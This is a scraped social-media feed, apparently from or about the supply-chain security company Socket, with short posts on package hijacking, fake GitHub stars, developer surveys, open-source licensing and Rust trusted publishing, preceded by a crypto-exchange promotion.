🔥The 9th Round of Easy Loan, Earn $40 Reward is in progress❗️ ⏰ Promotion Period: January 15th - Feburary 15th, 2025 👉 Register now and check more details at gate.io/campaigns/358

Wes Socket ExpressJS Love what Socket is doing!

Exciting to see ExpressJS using Socket. 💜 Any public open source project can get a free upgrade to our Team plan to help block zero-day supply chain attacks and analyze dependencies for risky or malicious behavior. socket.dev/blog/free-team…

There's more than just the code! Look at that spike!

🚀

There are many incentives that perpetuate the manipulation of GitHub stats - perceived quality/safety/aptitude. Pay $10 get 100 ⭐️ => good dev. Really great job by the socket.dev team 👏

Excellent point!

watched this presentation by Feross ~5 years ago and it blew my mind - really opened my eyes to the power of the web platform and the fun stuff you can do with it i think about it every once in a while and occasionally (like tonight) rewatch it youtube.com/watch?v=QFZ-pw…

This was quite interesting to watch unfold. Some projects deployed workflows to automatically delete the messages. In one case the workflow itself had an injection vuln. github.com/langchain-ai/l…

Some interesting highlights: - Approximately 1 in 4 Python developers are brand new to the language. 🤯 - A staggering 37% of #Python developers reported contributing to open source projects last year, with the vast majority being code contributions (77%).

Security teams cannot afford to focus on vulnerabilities to the exclusion of supply chain threats, says Socket's Feross Aboukhadijeh in this commentary, and offers a few strategies for combating alert fatigue. #cybersecurity #infosec #ITsecurity bit.ly/4gixlll

🔐 New report from OpenSSF highlights the urgent need for security education, with 28% of developers unfamiliar with secure coding practices and 53% having never taken a course on the topic. socket.dev/blog/openssf-r… #cybersecurity

So proud to partner with Replit ⠕ to keep their dependencies secure! cc Amjad Masad

Excited to finally release this – top request from our enterprise customers!

🚀 Excited that @mikolalysenko, Principal #Software #engineer Socket will speak at #NodeConfEU 2024 on #AI-Powered Malware Hunting! Discover how Socket scans open-source packages with #AI. Secure your tickets now: bit.ly/3V9ZIcx #NodeConfEU #AI #Cybersecurity

You may have seen news about “revival hijacking,” a new supply chain threat targeting packages that have been deleted from Python Package Index's index - Great research from JFrog! Here’s how you can use Socket to protect your #Python dependencies from hijacking socket.dev/blog/how-socke…

⭐ 3.7 Million Fake GitHub Stars: A Growing Threat Linked to Scams and Malware @Socketsecurity describes how attackers are paying for GitHub stars ($0.10 each) Which makes repos seem legitimate → spreads malware, cryptocurrency stealers, etc. How to find fake stars? 1️⃣ A low

Despite Elastic's return to open source, developers are still wary of the company's motives after it abandoned open source licensing in 2021. Many have moved to OpenSearch and aren't looking back after their trust was violated. socket.dev/blog/developer… #opensource #elasticsearch

“I saw my modest contributions under the Apache license being locked up behind this bullshit license and I learned my lesson: I'm never signing another contributor license again. My trust was violated." - Jilles van Gurp

Exciting improvement from Cloudflare

Rust's new RFC for "Trusted Publishing" proposes replacing long-lived API tokens with short-lived access tokens granted through the OIDC protocol to enhance security on Crates.io. A step forward for #Rust, if it gets adopted! 🚀🔒 socket.dev/blog/new-rust-… #RustLang